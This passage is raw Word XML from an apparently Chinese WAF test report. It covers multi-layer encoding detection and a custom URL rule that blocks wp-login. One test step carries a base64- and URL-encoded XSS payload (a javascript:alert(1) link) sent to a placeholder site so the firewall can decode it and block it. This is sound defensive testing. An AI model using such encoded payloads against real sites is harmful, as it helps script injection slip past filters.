                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="utf7_event_13e3e8e92caf4f05862695e850639a50_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId53"/>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406" name="Picture 385164406"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="utf7_event_13e3e8e92caf4f05862695e850639a50_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId54"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="450AB330">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1BD11FCC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40BD9BB1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:sym w:font="Wingdings 2" w:char="F052"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">通过     □部分通过     □未通过     □未测试 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>□无此功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14E8A649">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="468902C4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="113BFA3D">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44FBB241">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06F23505">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C3FEB1A">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2B2134">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc81916118"/>
      <w:bookmarkStart w:id="123" w:name="_Toc1858616200"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多层编码解析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>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07BF2CE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="40A5C326">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="323C5B01">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>多层编码解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6A5B6AC4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3E1EA094">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="38031C24">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造多层编码后的请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F8FC8C2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="501BCB4D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="55532A9A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729649C8">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A9976D2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行混合编码（编码时可使用h</w:t>
            </w:r>
            <w:r>
              <w:t>ackbar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件或者其他网络工具），然后在对应的测试站点后直接添加</w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和被编码的字符串，比如用浏览器访问如下链接：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/?value= JTI2JTIzeDNDJTNCYSUyMGhyZWYlM0QlMjYlMjN4MjclM0IlMjAlNUN0JTIwamF2YXNjcmlwdCUzQWFsZXJ0JTI4MSUyOSUyMCUyNiUyM3gyNyUzQiUyMCUyZiUyNiUyM3gzRSUzQg==</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6FFED3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被记录，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E7F4FD7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A1587BA">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6704CED3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功识别多层编码的攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164407" name="Picture 385164407"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="more_value_event_c9128876ad244e4eb123e0a15bf55b32_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId55"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164408" name="Picture 385164408"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="more_value_event_c9128876ad244e4eb123e0a15bf55b32_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId56"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5933D7B6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3526C71E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BB1A5D6">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8AB9A06">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="34E73A35">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25B0DBF9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CF39555">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77B4A85B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A40D8D6">
      <w:pPr>
        <w:spacing w:after="163" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CB387F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="326"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc21077815"/>
      <w:bookmarkStart w:id="125" w:name="_Toc81916119"/>
      <w:bookmarkStart w:id="126" w:name="_Toc465344138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="4343472A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc81916120"/>
      <w:bookmarkStart w:id="128" w:name="_Toc21077816"/>
      <w:bookmarkStart w:id="129" w:name="_Toc2050968639"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="12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14DD12B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="070DE6BC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3B5970EC">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义URL匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51A7CCB7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="515E4ABE">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="2966390F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配URL规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C13C018">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D656146">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="25517746">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41597ECA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2161D45D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点url中包含wp</w:t>
            </w:r>
            <w:r>
              <w:t>-login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411CCA7A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问：h</w:t>
            </w:r>
            <w:r>
